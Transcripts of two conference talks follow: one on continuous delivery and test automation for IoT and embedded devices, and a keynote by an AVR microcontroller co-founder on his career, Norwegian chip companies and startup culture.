I think the only way that we can actually have this continuous delivery of working software, the actualization of that is only if we take testing seriously. I see a lot of companies that really focus on automation, but it's always around build. Their testing is very, very weak. The testing is the only thing that makes sure what you're delivering is actually any good. There's no sense in delivering crap really fast. Anyone can do that. So there's a lot of discussion like how does testing fit into IoT embedded, all these kind of product kind of devices, like even if you're making cars, what does testing look like? This doesn't really fit. We don't really think about UIs and services. Obviously, we have units, but we do have a testing pyramid, but it's not quite the same. Of course, we need this idea of a system test, a full level system test, integration end to end, full test. This is the only way you make sure everything is connected. In IoT devices, this usually requires a lot of programming actually. You need to spend a lot of time to automate this because unlike unit tests where you just use a test framework for your language and start writing tests, system tests for embedded and IoT devices actually require a lot more. They're usually very custom things. You need to be able to control the power to the device, turn it on, turn it off. You need to be able to program it with new code, like access its flash. If it is a device that engages with the environment in some way, changes the environment in some way, you need to control those actuators through some kind of API. And you also need to be able to sense the results. One system I worked on was a steering system for marine seismic acquisition. What that was is a big cable you drag through the sea and you steer it around. They want to make sure it's at the right depth and it's in the right place. How do you test something like that? You can send it lots of commands and you hope that what it's doing is correct. 
But what you need to do is sense what it's doing physically in the world. You want to see that actually the blade is at this angle. So you need to have some kind of watch guardian over these systems to see if they are interacting with the environment that they interact correctly. We don't have services, but we do have components. We can test things in isolation and we should aim to test things in isolation as much as we can. The idea of microservices is just as equally applicable to IoT and is to figure out what is the way to isolate the change and find an abound in context for these devices. And of course, unit tests are great. We should have them everywhere and make development super fast. I get a lot of pushback actually from management when I show this slide because they say, well, if I'm writing all these end-to-end system tests, why do I need the unit tests? And if I'm writing all these unit tests, why do I need the end-to-end system tests? I didn't really have a good answer for that until I read this book, Growing Object Oriented Software Guided by Tests, which is really good. It doesn't really say much about IoT, but what it does tell you is different types of tests give you different types of feedback. And the important thing to know is unit tests give you a lot of feedback about your internal quality. They tell you that the code is easy to change, is probably well understood, that it works how the developer expected. It doesn't tell you anything about your external, about your, where are we? It doesn't tell you anything about your external quality. How much this, together as a system, meets the requirements of the customer. And the same is true for the end-to-end tests. The end-to-end tests tell you very little about how easy the code is to change, how safe it is to change, but it tells you an awful lot about whether the system as a whole meets the needs. Clear? No. 
So with IoT it adds an extra level to this, because what is a system test in the context of IoT? These IoT systems are distributed in a sense. When you say end-to-end, if your intelligent light bulb connects to a cloud service which connects to your phone so that you can control the hue or the color of this light bulb, how do you do an end-to-end system test? Do you include the whole internet? Do you include deploying a web service to do this? This is a really hard problem to solve. And you have to solve it, because it's the complex nature of the interaction of all those things together that will produce your failure modes. Another important thing is that there has to be access to hardware. The developers and the testers and the customers all need access to this hardware, so that you can make sure that what you're running in the lab is the same thing the customers are using and the same thing you have on your laptop. So the goal, I wrote this slide yesterday, the goal is to go from one-year product cycles to one-hour product cycles; that's the difference between using continuous delivery and the old way of doing software. I thought that was quite a gimmicky sales-pitch thing to say, but then when Peter talked about Volvo, he talked about going from, I think, 46 weeks to 10 minutes. So this was maybe even a little underambitious. When you can get development cycles from one year to one hour, it really changes the way you can deliver product to customers and change your plans. Another interesting aspect of this is the Novelda story. Now, Novelda make this radar chip; it's very clever, it can do all kinds of things. It can detect your breathing, it can monitor your breathing, it can know whether you're sleeping, it can tell us how many people are in this room, whether they're dead or alive, for instance, small details like that. And they take continuous delivery very seriously as well. But they have a problem.
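One common answer to "do you include the whole internet?" is to draw the end-to-end boundary at an in-process stub of the cloud service, so the device-to-cloud-to-phone path can be exercised without deploying anything. The sketch below assumes that approach; `StubCloud`, `Bulb`, and the command format are invented for illustration.

```python
# Sketch: an "end-to-end" test of the bulb/cloud/phone path, with the
# cloud replaced by a local in-process stub. All names are illustrative.

class StubCloud:
    """In-process stand-in for the real cloud service."""
    def __init__(self):
        self.pending = {}

    def publish(self, device_id, command):
        self.pending[device_id] = command

    def poll(self, device_id):
        return self.pending.pop(device_id, None)

class Bulb:
    """Device-side logic: polls the cloud and applies commands."""
    def __init__(self, device_id, cloud):
        self.device_id = device_id
        self.cloud = cloud
        self.color = "white"

    def sync(self):
        command = self.cloud.poll(self.device_id)
        if command and command.get("set_color"):
            self.color = command["set_color"]

def test_phone_command_reaches_bulb():
    cloud = StubCloud()
    bulb = Bulb("bulb-1", cloud)
    # The "phone" publishes through the same API the real app would use.
    cloud.publish("bulb-1", {"set_color": "warm-red"})
    bulb.sync()
    assert bulb.color == "warm-red"
```

The trade-off is exactly the one discussed above: this exercises the interaction between the pieces, but a stub will never reproduce the failure modes of the real network, so it complements rather than replaces a full system test against real infrastructure.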
When they make a radar with signal processing that's supposed to monitor whether a baby is breathing or not, how do you test that? Actually, in one of the first months I was there, I called up some friends that were on maternity leave, and they came with their babies and we put the radar on them. That was fun, because we had to tell these mothers: we're going to put radars on your babies, is that okay? Surprisingly, they said yes. That's some trust. But that's not reproducible, right? Even if we collect all that data and run it over and over again, that's not a good test. It's maybe a good acceptance test, maybe a good product demonstration, but it's no way to run your development process, because between the time that test is happening and the time you deliver your product, you might have made a thousand or two thousand commits, all changing the behavior of your code. So the guys at Novelda were very clever, and what they realized was that if they took a ball bearing and rotated it at a certain frequency in front of the radar, it looks just like the chest cavity of a baby. You get basically the same information. And because LEGO is more or less invisible to radar, it doesn't have a very high reflection, this was a great solution. What they did was set up a lab with all this LEGO. There are people at Novelda that get paid to play with LEGO, and they build all these different kinds of rigs to simulate a baby or whatever it is they happen to be testing for. If you want to test elderly care, you can just make a bigger ball bearing and rotate it slower, I don't know. But they have lots of fun robots there. And they took it even further as well. Continuous delivery wasn't just on the software; it was on the ASICs that they're producing, the hardware chips that they're taping out in silicon, right? They make a change to the RTL, the definition, if you like the source code for their ASIC.
They do some firmware builds, they do some system testing, they do synthesis: does this ASIC still synthesize, do all the tools work, can we do place and route? And then they do the final system test, and if that's good, then we know we have something still on track. So you can go really far with this stuff, even outside the realm of software, and this is where hardware-software co-design can become very interesting. Like I said, in marine seismic we have very similar systems. Systems could fail in all kinds of strange ways. When you have 100,000 sensors and all kinds of physical equipment that you're dragging in the sea, a shark could come and take a bite out of it thinking it was some food, all kinds of fun stuff. But one of the most interesting things, in terms of IoT, that I think is applicable, is the idea of FMEA. Does anyone know what FMEA is? It's failure mode and effects analysis. Thank you. And the idea is that you sit down and you look at the whole picture of the system, all the ways it interacts with the world, all the different ways it could fail. And then you say, well, if that failed, what would happen? And if that failed, what would happen? And if that failed, what would happen? You get a list of all the outcomes from different failures and try to look for complex failure modes. And then from that, you have to figure out, okay, how do we mitigate those different kinds of failures? It's a very systematic approach. We say, okay, these ones we can actually test; we can add test systems around them. These ones we can add tests in production, so that if something happens while the software is running, we can recover from it, we can set this kind of state in the software. So if you are building a complex distributed IoT system, I recommend you take a look at FMEA. That's about it, really.
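FMEA worksheets commonly score each failure mode 1-10 for severity, occurrence, and detectability, and rank by the risk priority number RPN = S × O × D. A minimal sketch of such a worksheet as data (the entries themselves are invented examples, not from a real analysis):

```python
# Sketch: a minimal FMEA worksheet as data. RPN = severity * occurrence
# * detection ranks which failure modes to mitigate first. A higher
# detection score means the failure is harder to detect. The entries
# below are invented examples.

def rpn(mode):
    return mode["severity"] * mode["occurrence"] * mode["detection"]

failure_modes = [
    {"mode": "lost radio link to sensor",
     "severity": 6, "occurrence": 7, "detection": 3},
    {"mode": "actuator stuck at full deflection",
     "severity": 9, "occurrence": 2, "detection": 6},
    {"mode": "corrupted firmware after update",
     "severity": 8, "occurrence": 3, "detection": 2},
]

# Rank failure modes so the highest-risk ones get mitigations first:
# a dedicated system test, a production self-test, or a watchdog.
ranked = sorted(failure_modes, key=rpn, reverse=True)
for m in ranked:
    print(m["mode"], rpn(m))
```

The ranking then maps onto the mitigation buckets described above: modes you can cover with test systems, and modes that need runtime checks and recovery in production.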
I just want to finish with one story. I think every talk so far today has had a slide with Tesla in it, so I didn't want to be left out. This is the story of the hill start. There is a question of what the purpose is of being able to go from one year to one hour in your delivery cycle, and the purpose is to respond to your customers. Now, a couple of years ago, on the product forums on Tesla's website, one of their customers wrote in and said: I'm really annoyed when I'm on a hill at a red traffic light. I'm sitting there with my foot on the brake; I take my foot off the brake and put my foot on the accelerator when the light goes green, and the car slips back a little bit before it starts going forward. This is ridiculous. This is a luxury car. This should not happen. Other cars have got a hill start feature. Why doesn't the Tesla? So I guess someone in product marketing agreed with this guy, and the product teams started building the feature. They tested it, I hope. And then the software was ready to be released. It went over the air; Teslas automatically upgrade their firmware over the air. And then the customer one day got into his car in the morning and switched it on, and the dashboard on the Tesla said: good morning, your software has been updated overnight, we've run through the system tests, you're good to go. By the way, here's a list of the new features you have now, and one of them would be hill start. And if you were that customer complaining on the customer forums, you would feel ecstatic, right? And that's the purpose. Now, I think in the last talk somebody mentioned the Tesla hack; some students managed to hack a Tesla. And this is the flip side to being able to be responsive to change and responsive to the environment: when the researchers found this flaw, they went to Tesla, and the researchers praised Tesla for the way they handled the problem.
And Tesla gave them a reward. They fixed the software, they released it automatically over the net, and everybody got the new fixed software. So that security flaw was fixed for everyone. Now, other companies also have security flaws found, and they don't fare so well. Fiat Chrysler had to recall 1.4 million vehicles because hackers found vulnerabilities. And the sniper rifle sight, when that was hacked, they wanted to send USB sticks to the customers. That's not a solution to the problem. So this continuous delivery can actually help both on the security side and on the market-penetration side of the story. That's all. Does anyone have any questions? Okay, well, thank you.
Hardware, firmware, software, cloud, big data - help! How do the best companies manage the complexity of software development in the world of the IoT? This presentation will show the challenges of developing for the Internet of Things, and provide examples of how real companies have managed the complexity with continuous delivery, devops and test automation.
10.5446/50519 (DOI)
Okay, so thank you for inviting me. I think IoT is a word that we have only recently heard about, but in terms of technology, and what it does and what it is, I think we all feel that we have seen it before. When I think about IoT and I see what people define it as today, I remember I worked with Axis Communications back in 1995. We made a camera that was connected to the internet, and that was the Internet of Things, and we have built a lot of stuff from 1995 until now which we have connected to the Internet of Things. So I don't think there's a lot of new things here, but the term Internet of Things has been viewed as something completely new. For us developers, we know it's been going on for a long time, so it's a little bit frustrating to try to understand what the word means. What really is the big change from earlier to now is how we as people are willing to play with all these things, how we are willing to adapt to all this new social media stuff and gadgets. Sometimes when I wake up in the morning, I ask myself: do I really enjoy this, or is it too much? Does it really simplify my life, or does it make it more complicated? I mean, I'm a gadget guy, I admit that. I'm an early adopter of everything. I got the first Tesla in Trondheim, and that was actually my second Tesla, because I also had the first Tesla, the one that came before the Tesla that everyone knows about. And the Tesla is great. When my wife is driving, I can follow her on my map, and I can open the window if I think she's too hot, or I can blink the lights or honk the horn or do all kinds of things remotely when I'm in Texas in a board meeting at Silicon Labs or whatever. So that's a really neat feature, right?
And I have the iGrill thermometer, which lets me follow my steak on the grill while I do something else: surfing the internet or controlling my house or something like that. And I have this wonderful watch, and it will probably soon say that I have stepped 10,000 steps already, so I'm good for the day. But all these kinds of things start to annoy me. This morning I got a message from my summer house: the kitchen has not reported in 24 hours. And yesterday the bathroom had not reported in 24 hours. I started getting emails from all the stupid gadgets around, and in my summer house I have probably 30 sensors, and they ran out of battery, so they send me all these messages. So I have to go to my summer house and replace 30 batteries, and then I go back, and then I can see online: okay, I'm back online, I'm back online, I'm good. And I think, okay, it's good that all these things are there and they do things for me, but do they have to annoy me all the time? And then I realize that the Internet of Things starts to be something that can be a problem, and we all know we haven't even started yet. The good thing is, the other day I was driving in my car and listening to the radio, and they said: there's a new feature coming, that when you die you can put a little QR code on your gravestone. And I think: a QR code on my gravestone? Then I started to Google it, and it wasn't really a new thing; it was something that was actually available already in 2012. So when we die, we can put a QR code on the gravestone, and when you point your phone at it, people will get the story of your life. The important thing, though, is of course that you have to make the story before you die, because it needs to be your story. So I started on my story, and I haven't completed it, but I've started. This is how it could look, and this is a part of my story. I will remember you. Will you remember me?
Okay, so everything there I wish was true, except Angelina Jolie; I enjoy my wife much better, I think. But the key thing here is: why can't we just die on Facebook? They know everything about us already, so we wouldn't have to make all these videos. That would be the easy way. Okay, so back to the real story. Of course I didn't win the Tour de France, and I was not first on the moon, obviously. But if you think about it, you can make a lot of stories like that. My story is a little different, though, and I'm going to go through it, because I think it's important for what I believe are my most important characteristics: to actually create new companies and be an inspiration for other people. I was born in 1966, the same year Walt Disney died. He said: if you can dream it, you can do it. And I usually say: I can dream it, I can do it. So almost the same, but not exactly. The little girl up there is my sister. I called her my test rabbit, because when I was a kid I was experimenting with everything. I had a chemistry lab, so I made chemicals, and some of them were supposed to give strength and power, so they had to be tested and drunk. But I didn't want to test and drink them myself, and my little sister was two and a half years younger than me, so she was the person to drink and test them, and sometimes that wasn't really good. We also had a radio station; we sent out radio messages into the street where we lived, until the police came and shut me down. But I've always been very interested in flying, so I built my own hang glider. I took this big green plastic sheet and four ski poles and built a square hang glider, and I stepped up on our house, which was like six meters down to the ground, and I was standing there and said: oh shit, this looks a little small, or I look a little too heavy. I need someone a little lighter. And guess who was lighter than me?
That was my little sister. So I pulled her up there and said: hey, this is going to work fine, and I just pushed her out, and she fell straight down six meters into the ground. Fortunately there was a big thorn tree there, so she fell into that, and she survived. She didn't fly even a meter from the wall; it was just straight down, a free fall. We had to pull the thorns out of her, and she was okay. I mean, we became friends again maybe 20 years later. But that was one of my experiments. We also made nitroglycerine. My friend had a father who was a chemistry professor at NTNU, and when he was at work, we could go into the chemistry storage and get whatever chemicals we wanted. Get or steal, I don't know what to call it, but at least we got access to a lot of chemicals that you can make nitroglycerine with. So we did that, and we actually buried it in the ground, because if there was a new war coming, we wanted to be prepared; we wanted to be the new guys that would actually save the country. So we had to have some explosives hidden somewhere. That was part of my childhood. And I think my first electronic invention was curtains that opened when my wake-up clock rang. You remember the old wake-up clock, the round one: you twist up a spring, and when it rotates back it actually flips a switch, and that powered a wiper motor which opened my curtains. So when I was waking up in the morning, the curtains just opened and the light came into my room.
What's your worst experience with with me when I was young and she said when I came home as 11 years I was 11 years old and she came home from work and I had mounted a huge antenna on our house Because I wanted to add a radio communication now I was walking talking guy and I was dreaming about being a radio amateur, but I was only 11 right so it's But I had a huge antenna not as big as this one obviously But and the whole the picture there with a little hole is still in the house actually to get the cable to the antenna into the house And then I asked my my wife what because we got together when we were 14 God knows what she's made of But I think she remembered my room my kids room Because it was full of airplanes and it was full of Electronics and I had a huge carpet which was popular at that time and in the carpet you had Semiconductors and you had resistors so when you stepped on it you started to bleed and you cut yourself So that was her memories so Moving on we graduated from the engineering high school and or and and then and then enter and enter who at that time and then you and we started to I met VEG are and And we were both very interested in microprocessor and we started to get her at Nordic semiconductor or Nordic VLSI at the time and We did the risk microprocessor that was made originally for for a for a decoder for digital TV and Then we started to sell components. We started we changed the Nordic from being a consulting design consulting company to selling products and And what happened then was that the the management? 
didn't really believe that building microcontrollers was the way to go. So we decided to leave the company, and we bought the rights that Nordic Semiconductor had, and we went out to find a partner. And that's where the AVR history started, and I'm going to go a little bit through that history. We had a vision to make an easy-to-use microcontroller, and we wanted to make it available for everyone. The design tools from Microchip at the time were two thousand dollars, and the compiler was two thousand dollars, so it was very hard for us as students to get our hands on something like that. So we wanted to make something really unique, but we also had to be very unique on the microprocessor itself. We decided that flash technology, which we had heard about, was something we really needed, and there were two options at the time: Hitachi in Japan and Atmel in California. Our English was better than our Japanese, so the obvious choice was to go to California and meet with Atmel. We came into the room, we had a meeting with the CEO, and he said: you guys have ten minutes to convince me that this is a hundred-million-dollar business. I looked at Vegard and he looked at me, and we had a deck of 45 slides, right? With bits and bytes and registers and interrupts and flags and you name it. On the last slide we had a hundred million. So we decided at that moment to turn the slide deck upside down, because we could do that at the time; there was no PowerPoint on computers, we had actual slides. We just started with the last one, which said a hundred million, and then we moved our way backwards to the front. And he was sitting there for three and a half hours. So I used to say that if we hadn't done that maneuver of flipping the deck,
we probably would never have heard about the AVR history today. They sent us home and said: don't call us, we will call you. We went home, and I remember a couple of months later, in August, we were fishing in the river. Actually, Vegard was fishing in the river; when I fish in the river, I'm done in five minutes. If I don't get the salmon, I go and start to barbecue or something. I'm not patient enough to fish in the river. I can fish in the sea, where I get fish all the time, but I'm too impatient for river fishing. So I was barbecuing, and then George Perlegos called us and said: hey guys, can you come over? We want to make a deal with you. This menu is from the fish market in the Bay Area where we signed the deal, and that's where we really started to build the products. One interesting thing here: we all talk about scaling business plans, and our scaling was pretty easy, because our hundred million was a hundred million Norwegian kroner, and in George's mind it was a hundred million dollars. So it was a quick 6-7x scaling of the business plan, and we never said anything about it; we just did it. And five years later we had actually sold microprocessors for a hundred million dollars. Five years later: that was the first year where the business was a hundred million. And when I left the company in 2012, we sold three million microprocessors a day, about a billion microprocessors a year. So it was quite an achievement from a great team. We established the AVR as one of the absolute leading architectures in the world, and we had 1,200 people working on it in the end, spread around the different design centers. So it was one of the really great success stories.
And that's not the only great story I've been involved in. If you look at Norway, Norway has had, and still has, a lot of great technology companies that have played a significant role in the Internet of Things. Look at Chipcon, for example. Chipcon, which is today TI, and we have some representatives from them here today as well. If you look at what Chipcon did with the radios: they became very, very popular, TI bought them, and they became even more popular. I was one of the founders of Chipcon. I never worked there, but I was the chairman, so I was very closely involved, and me and Geir Førre and the people around Chipcon worked a lot together to try to use the best of what we knew and to try to help each other actually be successful. And the last company that Geir Førre started, and we also have keynotes from some of the people that are here today: Energy Micro, which is in this Fitbit watch and in many other wearables, was sold to Silicon Labs in 2013, and there's still really good growth in the sales of those microcontrollers. They also did a great radio specification, which is now brought to market, and I think it powers a lot of Internet of Things products. Another one which I find very interesting is Falanx. I remember when they participated in a Venture Cup in Trondheim. It was a group of people that came and wanted some advice, and they were like two, three guys, and one of them had this one-and-a-half liter of Coke with him all the time. And he didn't say anything, and his handshake was like... yeah, I can't even describe it, right?
And he was drinking Coke, but he was the brain. He was definitely the brain: when the questions became very, very difficult, they always looked at him, and he could give some small signals whether they were right or wrong, but nothing more. But he created such a great graphics processor that 40% of the smartphones in the market today use it, and that does not include Apple. They are in 50% of the tablets, and they have 75% of the desktop TV market. In 2015, their technology was in 750 million products. 750 million products. That's quite amazing, starting from three graduates from the university. And it was sold, you can say today too early, to ARM, but at least it's Norwegian technology that's really powering it. And then of course we have Nordic Semiconductor, which is very popular, especially with the latest Bluetooth Low Energy chips; it's doing great, penetrating the market greatly. And then of course ourselves, XeThru. We'll come back to that a little later. We make sleep sensors, and we make radar chips that go into this. And that's from my area, right, the semiconductor area. You represent other areas which have also been successful in IoT, but on the basic semiconductor technology, Norway has a really good standing in IoT. One example: the latest Galaxy S7 is powered by the Falanx graphics processors, probably has sensor hubs from Atmel based on the technology that we developed, and will maybe get lenses from poLight. poLight is a company in Norway that makes autofocus lenses. There is a lot of new technology developed in Norway that will also come into the smartphones, and we have to remember the role of the smartphone, because Steve Jobs said one thing in his keynote.
This is going to change everything. When he launched the iPhone in June 2007, he said: this is going to change everything. And he was right. This changed everything, and this is why IoT is something new: because the smartphone changed it. It changed it so we can be connected all the time, and we can have everything with us wherever we are. That's also why it changes our life; that's what's good about it, and that's what's bad about it, because we can't get away from it. It's so hard to leave this phone. You see, I'm holding it here all the time, right? Even while I'm here doing a keynote, it's really hard to let go of the phone. When the new CEO took over at Atmel in 2006, the stock price was around five, six dollars, and they just got acquired by Microchip for eight, after ten years. You can't do much worse than that in the stock market in terms of an investment, and the reason for that is that it's so difficult to move up in the food chain and actually add enough value. Your products become commodities and are almost equal from everyone. So I think the new game is a little different, because you have to think very differently. I believe you have to think much bigger, and I think you have to be smarter; you really have to be smarter. And I think you have to act much, much faster. Things are changing rapidly, and you have to be there, and you have to make sure that you get the absolute best people. It is not enough to get the second best; you need the best people, because the competition is so hard. And if you look at interesting things like Uber and Airbnb, and also Amazon: Amazon was a marketplace that didn't exist many years ago. Well, it's been around for a while now, but people were saying: I'm never going to buy from the internet. I'm never going to buy from the internet, it's so insecure.
My credit card is going to be stolen, everything's going to be crazy. I have bought on the internet since they started, and I have never lost any money from any credit cards. And if I call a store and ask them if they can get something for me, they say: call us back on Monday, because the guy that orders that is not here today. And I say, okay, I'll do that, and then I go online and buy the stuff, and on Monday it's already there on my doorstep. So things change, and if people don't follow this pace, they're going to be out of business. Take Airbnb. It's a great story. Joe and Brian couldn't afford to pay the rent, so they bought three air mattresses and decided to rent out those three mattresses and serve breakfast. So: Airbnb, three airbed mattresses and breakfast. That's where it started: they couldn't pay the rent for themselves. They made a little website to communicate this to the world, and you know what it is today. It was a ten-billion-dollar-value company in 2014, and they don't even own a single hotel. They did not even own a building, but they're the biggest provider in the world of this kind of service. So how can that happen? Why is that happening?
Sometimes we debate whether timing is important, whether the team is important, whether the financial power we have is important, or whether it is the idea or the business plan. I started to study this a little bit, looking at the big investors in the US, and they conclude that the timing is the most important. Airbnb got there because the recession in the US was so strong and people didn't have money. So when this service came out, it was really: oh yeah, I can make some extra money, and I need the extra money, so I go out and rent a room and put it on Airbnb, and then the ball starts to roll. So the timing is critical. For 42% of the successful companies, the companies that really make it, they concluded that the timing was the most important parameter, followed by the team and execution. And Uber, we all know: we have a taxi system in Norway, and we have a lot of taxi drivers trying to fight Uber. They're never going to make it; they have to adjust to the new game if they want to be successful. If you look into my field, another thing that's happening is that companies disappear, and they disappear because they cannot move up in the value chain and can't get the value for their product. So they get commoditized and their profit goes down. NXP bought Freescale, Intel bought Altera, and also Microchip, as I mentioned, bought Atmel, and Western Digital bought SanDisk. And I think that's an interesting one. Western Digital was one of the absolute biggest in hard drives, and SanDisk made memory cards for photo cameras and small portable players. What happened was that the technology developed so quickly that solid-state drives became affordable, and Western Digital was on these mechanical rotating discs while SanDisk actually made all those small solid-state memory cards.
So their technology became the game changer in the disk space, and Western Digital had to acquire them for a lot of money to actually continue to be a market leader. And I think it's the right thing; there's nothing wrong with mergers and acquisitions. But I also think people need to remember, when they build a company: where in the food chain am I? To be a semiconductor company and think you can beat Apple will never work, because your product will be commoditized. If you think like Airbnb and do what they did, you can be big. So the business model, the way you think, the way you start, is an important part of it. And if you look a couple of years from now, they say that about 40% of the enterprise companies will no longer exist. So make sure you are not one of them. So what companies do succeed? There is one company that I'm very interested in, and that is Nest. Has everyone here heard about Nest? Does anyone know what they are doing? It was started by Tony Fadell and Matt Rogers, and they left Apple. I always say Atmel, but no, they left Apple. Tony, by the way, has 300 patents from Apple. He was the inventor of the iPod and has huge traction in consumer products, and he was building a summer house, and he couldn't find a thermostat that was good. He looked at all these Honeywell things and all these crappy thermostats on the wall. They didn't look nice, and in the best case you could program one with a timer to say: hey, Sunday from four o'clock, not home anymore.
So turn down the heat and but Monday I'm back So you had to program all these things that's the best he could find So he decided to do a thermostat that looked good and that worked seamless So he developed a nest thermostat and the thermostat is quite amazing actually You put it on the wall you connect it and you just start to use it if it's too cold Well, then you turn it up if it's too hot you just turn it down if it's Friday and you go away you turn it down and On Monday when you come back you turn it on and after a while it starts to learn your habits It starts to learn your pattern. So it's a it's a machine learning algorithm. That's actually that's exactly what it's Thought to be just by you using it in the way you use it normally So after a while you don't have to leave it you are about to leave on Friday. Oh shit. It's already down good I like you guy and on Monday when you come back. Hey, it's already the warm here good I like that so it's so it's solve the problem because it's solve the problem that we all know about thermostats I have all kind of things I can do with my thermostats in terms of programming But do I ever sit down and program my thermostat? No, I don't but this guy Programs itself and that solves my problem It's quite interesting to and fascinating to listen to Tony when he describes how this thermostat got successful and one of the things to say that we have to make it easy to install and And one of the things nested was a developer screw that was working on concrete and wood and leka and all types of material So you had one screw that worked because they what didn't want to supply it with three four five different screw types to make sure The customer could mounted on any wall. So there are small details like that that makes the consumer products successful and if it if it's remember back nest had a thermostat and then they had a Smoke detector the nest protect and they sold the company four years later. 
They started in 2010 and sold to Google in 2014 for 3.2 billion dollars. 3.2 billion dollars for a thermostat that we all in this room could make. How can that happen? I think first of all we have to realize that what Google bought was not a thermostat. They bought the mindset, they bought a culture that could create new things, that could think in a new way, and that could actually execute on it. When I first visited Nest there were 70 people, then there were 170, then 400, next time 700, and last time I was there, a couple of weeks ago, there were 1,200 people. So they scale fast, they execute well, and they have a mindset that's really disruptive. I happen to know Tony a little bit because he's one of the angel investors in my company now, and since I was going to hold a keynote today, I asked him to give me one piece of advice that I could bring up on the screen and tell the people I'm talking to. He gave me a few, and I picked the one I think is the best: gadgets come and go — solve a problem. When I look at startup companies today, and I look at quite a few of them, many of them are about to do a me-too product. They don't even Google what's out there today, and they don't really solve a problem. And unless you really solve a problem, it's really hard to succeed. If I put up the year 2029, can anyone guess what I want to say with that? Has anyone read some articles lately about 2029? 2029 is the year they say that computers will be smarter than humans. When I was studying, artificial intelligence and neural networks were an interesting area, but people said it was never going to happen.
Some people said that digital film was never going to be as good as analog film either, and they were wrong. Maybe when we wake up in the morning in 2029 we have to ask ourselves who's really in control. Who's actually operating the WD-40 box on the side there — is it the robot itself, using it on the other guy, or is it the other guy using it on the robot? Who's in control? It's a little scary. We have seen machine-learning algorithms lately where computers, without having any idea about the game, start to play it; after ten minutes they start to get better, after an hour better still, and after a couple of hours they are awesome — they beat any human. So it's an area where we get the same ethical questions we have had with gene manipulation and things like that, and it's going to come here as well. But that's something we just have to control, I think. So let's look a little bit into business cultures. How do startups need to think? And I think this is also valid for mature companies. One of the big problems with mature companies is that they stop thinking like a startup, and thinking like a startup is really important for new innovation. That's why Chipcon was sold for 1.2 billion NOK, and why Energy Micro was sold for 1 billion NOK to Silicon Labs — because these companies represent a new way of thinking, and they had a strategy. They were able to execute; they really moved forward quickly. I'm going to go through — and this is of course what I believe, and you all probably have different views on this — but in my view it's really important how the culture in the company is structured and how we as humans think. So how many have heard about the marshmallow challenge? Okay, quite a few.
It's an interesting one. I'm one of the founders of the Maker Faire in Trondheim and the Trondheim Makers organization, and we have used that spaghetti-and-marshmallow building competition quite a lot. You get 20 sticks of spaghetti, one meter of tape, one meter of string, and one marshmallow, and the marshmallow has to go on top. You are a team of four, you get 18 minutes, and the goal is to build the highest tower with the marshmallow on top. There have been a lot of studies on this. One of the studies I looked at had lawyers, kindergarten graduates, architects and engineering graduates, CEOs, and CEOs with admins. Who do you think built the highest tower in 18 minutes? Kindergarten? Yeah — well, thank God it's not kindergarten. If it wasn't kindergarten, it was the architects. But it's a good guess, because kindergarten was number two. Kindergarten graduates actually built higher towers than the lawyers, than the business school students, than the CEOs — probably including myself. And it's interesting, right? The kindergarten graduates built higher towers than adults. When we added the admins to the CEOs, the CEOs performed better — or the admins did the work.
I don't know — it could be either; we'd need to look at the videos to actually find out. But the interesting thing here is that kindergarten performs above average, and I'm going to come back in a minute to why that is. In a good culture you always discuss new ideas, and you have a lot of different people — and it's important to have a lot of different people. People are so afraid to let people from other cultures or other parts of the world into their little protected area, but that is so important. You really need a huge variety of people. Those of us who have worked in the States for many years know that you have people from all over the world in the same place, and you don't even think about it — it's just the way it works. The dynamics are so important, and you have to amplify the differences to really get the good ideas out. That's very, very important. The next thing, which Silicon Valley is known for, is to fail fast. In Norway we tend to build the perfect product too early. We try to industrialize it, we try to build a nice enclosure, because we cannot show people an Arduino board connected with cables to a sensor connected to a display — it looks terrible. But that doesn't matter: smart people know that we can move that into something smaller whenever we want. When it works and it serves the purpose, we can move it into something smaller; that's not the difficult thing. The difficult thing is to solve the problem, and if we can solve the problem with something big and clumsy, let's do it — because we can do it tomorrow instead of waiting for perfect printed circuit boards to come back four weeks later. And the iterations go faster: we can change it, we can change it.
We can change the cable; we don't have to do any rerouting. So fail fast, and make sure you have discovery-driven learning. That's what happened with the kindergarten graduates: they didn't make a plan. The first thing they had to decide was not to eat the marshmallow, because that's the first thing they would do — I think that's where they struggled the most, to keep it in one piece. But then they started to fail. They said, aha, it fell down — let's build it up again. And they learned and learned, and in the 18 minutes they had failed several times and had these aha moments where they said, okay, we need to do it differently. The business students, meanwhile, made a plan. They said, okay, let's get an overview of the situation and make a plan: you do that, and you do that, and we put the marshmallow on top at the end. When there were five minutes left, they started to build — and it fell down. Well, the kindergarten graduates were on their fifth build when the time ended. So fail fast; discovery-driven learning is really, really important. In Novelda today, the company I'm running, I have a CEO who is extremely structured. When I explain the difference between me and him, I say my role is to do the right things and his role is to do things right, and one of the biggest debates we have is how perfect we need to build it at this stage. In the industry we talk about the minimum viable product. What is the minimum product?
What do we have to show, and to whom? To dumb people it doesn't matter what you show — they won't understand it anyway. But if you meet smart people, you can show them the minimum viable product and they will understand how it can be implemented into something bigger. The next thing, of course, is to reach the creative resolution, and I think that is really important: you have to push, make sure you differentiate enough, and use the creativity in the company. Nokia once said something very interesting: to explore new fields means taking risk — and to not explore new fields means taking even greater risk. So it's important to move the barrier and make sure you differentiate enough and create disruptive technology. If you look at my career: on the left side we have a tinyAVR chip, a great microcontroller; on the right side we have a chip about the same size, the X4 radar from Novelda. On the left side it's a commodity product — Microchip sells the same tinyAVR, and there are 45 providers of almost the same silicon. On the right side there's only one, and that's us. And what happens then is that on the right side we can walk in any door — Google, Samsung, Apple, Tesla, everyone — while on the left side we have to wait and see what happens; it's really difficult. On the right side we can get between five and fifteen dollars for the silicon; on the left side we get twenty-five, thirty cents. It's a big difference. Make sure you do the right things. Another important thing: who succeeds? As I told you, I'm very enthusiastic about aviation, and I think the history of the first aircraft that could transport a human being is really fascinating. Samuel Pierpont Langley — has anyone heard about him?
